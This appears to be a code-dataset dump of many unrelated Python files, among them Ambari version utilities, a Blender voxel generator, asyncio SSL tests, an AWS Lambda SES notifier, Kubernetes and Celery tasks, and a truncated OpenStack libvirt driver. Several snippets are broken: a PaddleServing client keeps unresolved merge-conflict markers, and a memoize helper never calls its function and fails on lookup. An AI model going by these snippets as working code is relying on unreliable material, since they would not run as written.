ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 7dfa6b82716242f0b792492ab22f8b2f39084cf5 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ambari Agent
"""
import re
def _normalize(v, desired_segments=0):
"""
:param v: Input string of the form "#.#.#" or "#.#.#.#"
:param desired_segments: If greater than 0, and if v has fewer segments this parameter, will pad v with segments
containing "0" until the desired segments is reached.
:return: Returns a list of integers representing the segments of the version
"""
v_list = v.split(".")
if desired_segments > 0 and len(v_list) < desired_segments:
v_list = v_list + ((desired_segments - len(v_list)) * ["0", ])
return [int(x) for x in v_list]
def format_stack_version(input):
"""
:param input: Input string, e.g. "2.2" or "GlusterFS", or "2.0.6.GlusterFS", or "2.2.0.1-885"
:return: Returns a well-formatted HDP stack version of the form #.#.#.# as a string.
"""
if input:
if "-" in input:
input_array = input.split("-")
input = input_array[0]
input = re.sub(r'^\D+', '', input)
input = re.sub(r'\D+$', '', input)
input = input.strip('.')
strip_dots = input.replace('.', '')
if strip_dots.isdigit():
normalized = _normalize(str(input))
if len(normalized) == 2:
normalized = normalized + [0, 0]
elif len(normalized) == 3:
normalized = normalized + [0, ]
normalized = [str(x) for x in normalized] # need to convert each number into a string
return ".".join(normalized)
return ""
def compare_versions(version1, version2, format=False):
"""
Used to compare either Ambari Versions, or Stack versions
E.g., Ambari version 1.6.1 vs 1.7.0,
Stack Version 2.0.6.0 vs 2.2.0.0
:param version1: First parameter for version
:param version2: Second parameter for version
:param format: optionally format the versions via format_stack_version before comparing them
:return: Returns -1 if version1 is before version2, 0 if they are equal, and 1 if version1 is after version2
"""
v1 = version1 if not format else format_stack_version(version1)
v2 = version2 if not format else format_stack_version(version2)
max_segments = max(len(v1.split(".")), len(v2.split(".")))
return cmp(_normalize(v1, desired_segments=max_segments), _normalize(v2, desired_segments=max_segments))
def get_major_version(full_version):
"""
:param input: Input string, e.g. "2.1.3.0" or "2.2.0.1-885" and other similar
:return: Returns a well-formatted HDP major stack version of the form #.# as a string. If can't get major version
return None
"""
pattern = re.compile(r'^[0-9]+\.[0-9]+')
major_version = None
m = pattern.search(full_version)
if m:
major_version = m.group()
return major_version
|
py | 7dfa6bbb235c56de04b317ceddd4cd361fa8d790 | import bge
from bge import logic as l
from random import randint
#import noise
import mathutils
import time
scene = l.getCurrentScene()
print(time.clock())
#builded = {}
MAP_HEIGHT = 40
wg = l.getCurrentController().owner
wg["blocknames"] = []
wg["voxel"] = {}
wg["blocks"] = {}
wg["needToBuild"] = []
wg["needToDel"] = []
wg["size"] = 21
scene.world.mistDistance = wg["size"] - 10
scene.world.mistStart = (wg["size"]) * 5/10
player = scene.objects["player"]
lastpos = player.worldPosition
player["lastpos"] = (lastpos.x,lastpos.y)
"""
0 Luft
1 dirt
2 dirt-gras
3 rock
"""
def fill_blocknames():
for block in scene.objectsInactive:
if block.name[:5] == "block":
wg["blocknames"].append(block.name)
wg["blocknames"].sort()
def getBlock(name_or_number):
try:
#fehler wenn es sich um einen Namen handelt Sprung zu except
int(name_or_number)
#wenn es sich um eine zahl handelt
return scene.objectsInactive[wg["blocknames"][name_or_number - 1]]
except:
#es handelt sich um einen String
return scene.objectsInactive[name_or_number]
def putblock(pos,typ):
b = wg["blocks"].get(pos)
if b == None:
wg.worldPosition = pos
wg["blocks"][pos] = scene.addObject(getBlock(typ),wg)
def delblock(pos):
b = wg["blocks"].get(pos)
if not b == None:
try:
b.endObject()
del wg["blocks"][pos]
except:
print("hat nicht loechen koennen!")
def untervoxel(pos):
unterevoxel = []
for x in range(-1,1):
for y in range(-1,1):
x += pos[0]
y += pos[1]
z = pos[2]-1
if not wg["voxel"].get((x,y,z)) == 0:
unterevoxel.append(wg["voxel"].get((x,y,z)))
return unterevoxel
def generator():
t0 = time.clock()
for x in range(-100,100):
for y in range(-100,100):
n = mathutils.noise.hetero_terrain((x/20,y/20,0),25,100,3,1,4)
#n = (noise.snoise2(x/15,y/15,1) + 1)/2
height = int(n * MAP_HEIGHT/3) + 1
for z in range(height + 1):
if z == height:
typ = 2
else:
typ = 1
wg["voxel"][x,y,z] = typ
print("generate. ", time.clock() - t0)
def delAufXY(x,y):
for z in range(MAP_HEIGHT + 10):
delblock((x,y,z))
def blockAufXY(x,y):
for z in range(MAP_HEIGHT + 10):
h = MAP_HEIGHT - z + 10
v = wg["voxel"].get((x,y,h))
voxeldrumrum = [wg["voxel"].get((x,y,h + 1)),
wg["voxel"].get((x,y,h - 1)),
wg["voxel"].get((x,y + 1,h)),
wg["voxel"].get((x,y - 1,h)),
wg["voxel"].get((x + 1,y,h)),
wg["voxel"].get((x - 1,y,h))]
außen = False
for vox in voxeldrumrum:
if vox == None:
außen = True
if v != None and außen:
putblock((x,y,h),v)
def initialbuildblocks(size,pos):
builded = {}
t0 = time.clock()
#von oben:
for x in range(pos[0] - size ,pos[0] + size + 1):
for y in range(pos[1] - size ,pos[1] + size + 1):
blockAufXY(x,y)
print("build. ", time.clock() - t0)
"""
for x in range(pos[0] - size ,pos[0] + size):
for y in range(pos[1] - size ,pos[1] + size):
for z in range(MAP_HEIGHT):
#builded[(x,y)] =
try:
putblock((x,y,z),wg["voxel"].get((x,y,z)))
except:
pass
"""
def deltapos(last,p):
return int(p[0]) - int(last[0]),int(p[1]) - int(last[1])
def refreshblocksList():
size = wg["size"]
pos = int(player.worldPosition.x),int(player.worldPosition.y)
dp = deltapos(player["lastpos"],pos)
if not dp == (0,0):
if abs(dp[0]) == 1:
print("###################################################### ",dp[0]," bewegt###############################################")
xp = dp[0] * (size) + pos[0]
xd = dp[0] * -(size + 1) + pos[0]
for y in range(pos[1] - size ,pos[1] + size + 1):
wg["needToBuild"].append((xp,y))
wg["needToDel"].append((xd,y))
player["lastpos"] = pos
#putblock((xp,y,z),voxel.get((xp,y,z)))
#delblock((xd, y, z))
if abs(dp[1]) == 1:
print("###################################################### ",dp[1]," bewegt###############################################")
yp = dp[1] * (size) + pos[1]
yd = dp[1] * -(size+1) + pos[1]
for x in range(pos[0] - size ,pos[0] + size + 1):
wg["needToBuild"].append((x,yp))
wg["needToDel"].append((x,yd))
player["lastpos"] = pos
#putblock((x,yp,z),voxel.get((x,yp,z)))
#delblock((x, yd, z))
#print("blocktobuild", wg["needToBuild"])
#print("blockstodel",wg["needToDel"])
def rebuildTerrain():
t0 = time.clock()
while len(wg["needToBuild"]) > 0 and (time.clock() - t0) < 0.002:
p = wg["needToBuild"][0]
blockAufXY(p[0],p[1])
wg["needToBuild"].pop(0)
while len(wg["needToDel"]) > 0 and (time.clock() - t0) < 0.002:
p = wg["needToDel"][0]
delAufXY(p[0],p[1])
wg["needToDel"].pop(0)
#print("muesste leer sein", wg["needToBuild"])
#print("muesste leer sein",wg["needToDel"])
fill_blocknames()
generator()
initialbuildblocks(wg["size"],(0,0,0))
player["started"]= True
def main():
pass |
py | 7dfa6c2c63b2be27818b08130d194f075f4dd395 | """Tests for asyncio/sslproto.py."""
import logging
import unittest
from unittest import mock
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio import log
from asyncio import sslproto
from asyncio import test_utils
@unittest.skipIf(ssl is None, 'No ssl module')
class SslProtoHandshakeTests(test_utils.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def ssl_protocol(self, waiter=None):
sslcontext = test_utils.dummy_ssl_context()
app_proto = asyncio.Protocol()
proto = sslproto.SSLProtocol(self.loop, app_proto, sslcontext, waiter)
self.assertIs(proto._app_transport.get_protocol(), app_proto)
self.addCleanup(proto._app_transport.close)
return proto
def connection_made(self, ssl_proto, do_handshake=None):
transport = mock.Mock()
sslpipe = mock.Mock()
sslpipe.shutdown.return_value = b''
if do_handshake:
sslpipe.do_handshake.side_effect = do_handshake
else:
def mock_handshake(callback):
return []
sslpipe.do_handshake.side_effect = mock_handshake
with mock.patch('asyncio.sslproto._SSLPipe', return_value=sslpipe):
ssl_proto.connection_made(transport)
def test_cancel_handshake(self):
# Python issue #23197: cancelling a handshake must not raise an
# exception or log an error, even if the handshake failed
waiter = asyncio.Future(loop=self.loop)
ssl_proto = self.ssl_protocol(waiter)
handshake_fut = asyncio.Future(loop=self.loop)
def do_handshake(callback):
exc = Exception()
callback(exc)
handshake_fut.set_result(None)
return []
waiter.cancel()
self.connection_made(ssl_proto, do_handshake)
with test_utils.disable_logger():
self.loop.run_until_complete(handshake_fut)
def test_eof_received_waiter(self):
waiter = asyncio.Future(loop=self.loop)
ssl_proto = self.ssl_protocol(waiter)
self.connection_made(ssl_proto)
ssl_proto.eof_received()
test_utils.run_briefly(self.loop)
self.assertIsInstance(waiter.exception(), ConnectionResetError)
def test_fatal_error_no_name_error(self):
# From issue #363.
# _fatal_error() generates a NameError if sslproto.py
# does not import base_events.
waiter = asyncio.Future(loop=self.loop)
ssl_proto = self.ssl_protocol(waiter)
# Temporarily turn off error logging so as not to spoil test output.
log_level = log.logger.getEffectiveLevel()
log.logger.setLevel(logging.FATAL)
try:
ssl_proto._fatal_error(None)
finally:
# Restore error logging.
log.logger.setLevel(log_level)
if __name__ == '__main__':
unittest.main()
|
py | 7dfa6c40603b2563ff9f0c60e72fb98aa08a76b3 | def memoize(fn):
"""storage of arguments and respective result"""
cache = {}
def cacheing(*args):
if cache[args]:
return cache[args]
return cacheing
def slowFib(n):
if (n < 2):
return n
else:
return slowFib(n - 2) + slowFib(n - 1)
|
py | 7dfa6e103abfa2186f4af1ce117e731b60e6621e | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# one-server documentation build configuration file, created by
# sphinx-quickstart on Sat Feb 21 10:59:15 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../../src/'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.development")
import django
django.setup()
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'one-server'
copyright = '2015, JR Minnaar'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'onedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'one-server.tex', 'one-server Documentation',
'JR Minnaar', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'one-server', 'one-server Documentation',
['JR Minnaar'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'one-server', 'one-server Documentation',
'JR Minnaar', 'one-server', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
py | 7dfa6e10d40c6bdc23ef559c9683920262e8cf27 | """
This code uses PyProbables:
https://pyprobables.readthedocs.io/en/latest/index.html
You will have to install PyProbables to use this code.
This code is a straightforward application of the
BloomFilter and CountMinSketch classes in PyProbables
to create an agent with a single input stream and a single
output stream. The input stream contains operations on an
object of one of the two classes and the output stream
contains results of the operations.
"""
import sys
import os
sys.path.append(os.path.abspath("../../IoTPy/core"))
sys.path.append(os.path.abspath("../../IoTPy/multiprocessing"))
sys.path.append(os.path.abspath("../../IoTPy/agent_types"))
sys.path.append(os.path.abspath("../../IoTPy/helper_functions"))
# stream is in ../../IoTPy/core
from stream import Stream
# op, source, sink are in ../../IoTPy/agent_types
from op import map_element
from source import source_file_to_stream
from sink import stream_to_file
# multicore is in ../../IoTPy/multiprocessing
from multicore import run_single_process_single_source
# helper_control is in ../../IoTPy/helper_functions
from helper_control import _no_value
import copy
from probables import (BloomFilter)
from probables import (CountMinSketch)
from probables.hashes import (default_sha256, default_md5)
def membership_in_stream(in_stream, out_stream, membership_object):
"""
Parameters
----------
in_stream: Stream
The input stream of the agent.
Each element of the input stream is a pair:
(function_name, string) where function_name is
a string which is one of 'add', 'check', 'remove'
or other string associated with a method of
membership_object.
out_stream: Stream
The output stream of the agent. The output stream
contains results of executing the method specified
by function name on membership_object.
membership_object: Membership
An instance of a Membership class such as BloomFilter
or CountMinSketch from PyProbables.
"""
def func(element):
# Each element of the input stream is assumed to be a
# pair: function_name and a value.
function_name, value = element
if function_name == 'add':
membership_object.add(value)
return _no_value
elif function_name == 'remove':
membership_object.remove(value)
return _no_value
elif function_name == 'check':
return (value, membership_object.check(value))
else:
raise ValueError
map_element(func, in_stream, out_stream)
#----------------------------------------------------------------------
# TESTS
#----------------------------------------------------------------------
def test_membership(
in_filename, bloom_filter_filename, count_min_sketch_filename):
"""
Parameters
----------
in_filename: str
name of the input file. This file contains two strings
separated by blanks on each line. The strings are a
function name and a value.
bloom_filter_filename: str
The output file which contains results of the operations
specified by the input file on a membership object of
type BloomFilter.
count_min_sketch_filename: str
The output file which contains results of the operations
specified by the input file on a membership object of
type CountMinSketch.
Note
----
This code creates a network with the following agents.
A single source agent reads the specified input file and
puts the contents of the file on a stream.
Two agents read the source stream; one agent produces
the bloom filter output and the other produces the count min
sketch output stream.
Agents copy the output streams to files
"""
# bloom_filter and count_min_sketch are examples of
# membership_object.
bloom_filter = BloomFilter(
est_elements=1000, false_positive_rate=0.05,
hash_function=default_sha256)
count_min_sketch = CountMinSketch(width=100000, depth=5)
def compute_func(in_streams, out_streams):
bloom_filter_out_stream = Stream('Bloom output stream')
count_min_sketch_out_stream = Stream('CountMinSketch output stream')
membership_in_stream(
in_stream=in_streams[0],
out_stream=bloom_filter_out_stream,
membership_object=bloom_filter)
membership_in_stream(
in_stream=in_streams[0],
out_stream=count_min_sketch_out_stream,
membership_object=count_min_sketch)
stream_to_file(
in_stream=bloom_filter_out_stream,
filename=bloom_filter_filename)
stream_to_file(
in_stream=count_min_sketch_out_stream,
filename=count_min_sketch_filename)
def source_func(out_stream):
"""
Puts the input file on to a stream.
"""
def g(element):
function_name, obj = element.split()
return (function_name, obj)
return source_file_to_stream(
func=g, out_stream=out_stream, filename=in_filename)
# Execute a single process with the specified single source
# and with the agents specified in compute_func.
run_single_process_single_source(source_func, compute_func)
def test_count_min_sketch(in_filename, out_filename):
membership_object = CountMinSketch(width=100000, depth=5)
def compute_func(in_streams, out_streams):
y = Stream('Bloom output stream')
membership_in_stream(
in_stream=in_streams[0], out_stream=y, membership_object=membership_object)
stream_to_file(in_stream=y, filename=out_filename)
def source_func(out_stream):
def g(element):
function_name, obj = element.split()
return (function_name, obj)
return source_file_to_stream(
func=g, out_stream=out_stream, filename=in_filename)
run_single_process_single_source(source_func, compute_func)
#----------------------------------------------------------------------
# RUN TESTS
#----------------------------------------------------------------------
if __name__ == '__main__':
print ('Test count_min_sketch')
test_count_min_sketch(
in_filename='input_membership_test.txt',
out_filename='output_count_min_sketch.txt')
print ('Output is in file output_count_min_sketch.txt')
print
print ('Test membership with Bloom Filter')
test_membership(
in_filename='input_membership_test.txt',
bloom_filter_filename='output_bloom_filter_filename.txt',
count_min_sketch_filename='output_count_min_sketch_filename.txt')
print ('Output is in file output_count_min_sketch_filename.txt')
|
py | 7dfa6e97058f14120897b3bda27e587bb78f9a6f | nome=input('qual e o seu nome?')
print('e um prazer te conhecer,',nome)
print('bem-vindo')
|
py | 7dfa6f7517e45ac46bfbcbf3be44e5b997fbc862 | from django.test import TestCase
# Create your tests here.
import datetime
from django.utils import timezone
from .models import Question
class QuestionModleTest(TestCase):
def test_was_published_recently_with_feature_question(self):
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
|
py | 7dfa70034672c8fad9da107f8c2e60eb078a99ad | import boto3
import base64
import gzip
import ast
import os
import json
import datetime
ses = boto3.client('ses')
def notify(from_address, to_address, subject, message):
ses.send_email(
Source = from_address,
Destination={'ToAddresses': [to_address],'CcAddresses': []},
Message={ 'Subject': {'Data': subject },'Body': {'Text': {'Data': message }}}
)
def handler(event, context):
str = event["awslogs"]["data"]
bytes = base64.b64decode(str)
data = gzip.decompress(bytes)
print(data.decode('utf-8'))
events = ast.literal_eval(data.decode('utf-8'))
for event in events["logEvents"]:
message = json.loads(event["message"])
response = message.get("responseElements",{})
eventSource = message.get("eventSource","N/A")
eventName = message.get('eventName',"N/A")
awsRegion = message.get("awsRegion","N/A")
instance = response.get("instancesSet",{}).get("items",[{}])[0]
imageId = instance.get("imageId","N/A")
instanceId = instance.get("instanceId","N/A")
instanceType = instance.get("instanceType","N/A")
instanceState = instance.get("instanceState",{}).get("name","N/A")
latency = datetime.datetime.utcnow() - datetime.datetime.strptime(message["eventTime"],'%Y-%m-%dT%H:%M:%SZ')
subject = f"AWS Notification ({latency})"
body = f"{eventSource} {eventName} in {awsRegion}\nImageId: {imageId}\nInstanceId: {instanceId}\nInstanceType: {instanceType}\nInstanceState: {instanceState}"
notify(os.environ['EMAIL_FROM'], os.environ['EMAIL_TO'], subject, body)
return data.decode('utf-8') |
py | 7dfa70f5c1efb368c01abfef1fecc72fda733ebe | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_weaponsmith_trainer_02.iff"
result.attribute_template_id = 9
result.stfName("npc_name","human_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
py | 7dfa71b2c846829b105add786a002117ab5778e0 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from paddle_serving_server_gpu.pipeline import PipelineClient
except ImportError:
from paddle_serving_server.pipeline import PipelineClient
import base64
client = PipelineClient()
client.connect(['127.0.0.1:9994'])
imgpath = "../../drink_dataset_v1.0/test_images/001.jpeg"
<<<<<<< HEAD
=======
>>>>>>> fe3e776d114add6c6ad7aaede793bbc5cdcedbb9
def cv2_to_base64(image):
return base64.b64encode(image).decode('utf8')
if __name__ == "__main__":
with open(imgpath, 'rb') as file:
image_data = file.read()
image = cv2_to_base64(image_data)
for i in range(1):
ret = client.predict(feed_dict={"image": image}, fetch=["result"])
print(ret)
|
py | 7dfa73a057c3df768b57b21781154e548978205a | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
from ..compatibility import StringIO
from ...contenttypes import ContentTypes
class TestInitialisation(unittest.TestCase):
"""
Test initialisation of the ContentTypes class and call a method.
"""
def setUp(self):
self.fh = StringIO()
self.contenttypes = ContentTypes()
self.contenttypes._set_filehandle(self.fh)
def test_xml_declaration(self):
"""Test ContentTypes xml_declaration()"""
self.contenttypes._xml_declaration()
exp = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
if __name__ == '__main__':
unittest.main()
|
py | 7dfa7469908a470e75a9bb755b03c9c37e45f69d | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-26 12:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Bookeep', '0002_book_user'),
]
operations = [
migrations.AlterField(
model_name='book',
name='finish_date',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='book',
name='start_date',
field=models.DateTimeField(),
),
]
|
py | 7dfa748eb4198c80570a0911b8e474392e77ba9e | import json
from lib.k8s import K8sClient
class replaceExtensionsV1beta1NamespacedReplicaSetStatus(K8sClient):
def run(
self,
body,
name,
namespace,
pretty=None,
config_override=None):
ret = False
args = {}
args['config_override'] = {}
args['params'] = {}
if config_override is not None:
args['config_override'] = config_override
if body is not None:
args['body'] = body
else:
return (False, "body is a required parameter")
if name is not None:
args['name'] = name
else:
return (False, "name is a required parameter")
if namespace is not None:
args['namespace'] = namespace
else:
return (False, "namespace is a required parameter")
if pretty is not None:
args['params'].update({'pretty': pretty})
if 'body' in args:
args['data'] = args['body']
args.pop('body')
args['headers'] = {'Content-type': u'application/json', 'Accept': u'application/json, application/yaml, application/vnd.kubernetes.protobuf'} # noqa pylint: disable=line-too-long
args['url'] = "apis/extensions/v1beta1/namespaces/{namespace}/replicasets/{name}/status".format( # noqa pylint: disable=line-too-long
body=body, name=name, namespace=namespace)
args['method'] = "put"
self.addArgs(**args)
self.makeRequest()
myresp = {}
myresp['status_code'] = self.resp.status_code
try:
myresp['data'] = json.loads(self.resp.content.rstrip())
except ValueError:
myresp['data'] = self.resp.content
if myresp['status_code'] >= 200 and myresp['status_code'] <= 299:
ret = True
return (ret, myresp)
|
py | 7dfa75728d2f14c760b87f7d450fde85c29d11fe | """meps_db URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path("", include("meps_db.components.urls")),
path("admin/", admin.site.urls),
]
|
py | 7dfa770af2c99de570999e8254f6e83686f88e03 | __all__ = ['transactions',
'chains',
'objecttypes',
'operations',
'memo',
'account']
|
py | 7dfa77ba0af70c19043e7428356cbadbef9f5e53 | """
Zeichnen mit gamegrid
LightOut Game
========= TigerJython =========="""
from gamegrid import *
def pressCallback(e):
loc = toLocationInGrid(e.getX(), e.getY())
locs = [0] * 5
locs[0] = Location(loc.x, loc.y)
locs[1] = Location(loc.x, loc.y - 1)
locs[2] = Location(loc.x, loc.y + 1)
locs[3] = Location(loc.x - 1, loc.y)
locs[4] = Location(loc.x + 1, loc.y)
for i in range(5):
a = getOneActorAt(locs[i])
if a != None:
a.showNextSprite()
refresh()
return True
makeGameGrid(5, 5, 50, Color.black, False,
mousePressed = pressCallback)
setTitle("LightsOut")
for i in range(5):
for k in range(5):
lamp = Actor("sprites/lightout.gif", 2)
addActor(lamp, Location(i, k))
lamp.show(1)
show()
|
py | 7dfa784bf19603acf1a11e49c12061e91c143800 | from celery import Celery
from celery.schedules import crontab
from micro import get_offers_all
import config
celery = Celery()
celery.config_from_object(config)
@celery.task(name="periodic_task")
def periodic_task():
print("Getting offers from Offers MS...")
get_offers_all()
|
py | 7dfa787fd69bfdccc6ad3614270dc84a320e8add | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2011 Midokura KK
# Copyright (C) 2011 Nicira, Inc
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""VIF drivers for libvirt."""
from nova import exception
from nova import flags
from nova.network import linux_net
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova import utils
from nova.virt import netutils
from nova.virt import vif
from nova.virt.libvirt import config
LOG = logging.getLogger(__name__)
libvirt_vif_opts = [
cfg.StrOpt('libvirt_ovs_bridge',
default='br-int',
help='Name of Integration Bridge used by Open vSwitch'),
cfg.BoolOpt('libvirt_use_virtio_for_bridges',
default=False,
help='Use virtio for bridge interfaces'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(libvirt_vif_opts)
flags.DECLARE('libvirt_type', 'nova.virt.libvirt.driver')
LINUX_DEV_LEN = 14
class LibvirtBridgeDriver(vif.VIFDriver):
"""VIF driver for Linux bridge."""
def _get_configurations(self, instance, network, mapping):
"""Get a dictionary of VIF configurations for bridge type."""
mac_id = mapping['mac'].replace(':', '')
conf = config.LibvirtConfigGuestInterface()
conf.net_type = "bridge"
conf.mac_addr = mapping['mac']
conf.source_dev = network['bridge']
conf.script = ""
if FLAGS.libvirt_use_virtio_for_bridges:
conf.model = "virtio"
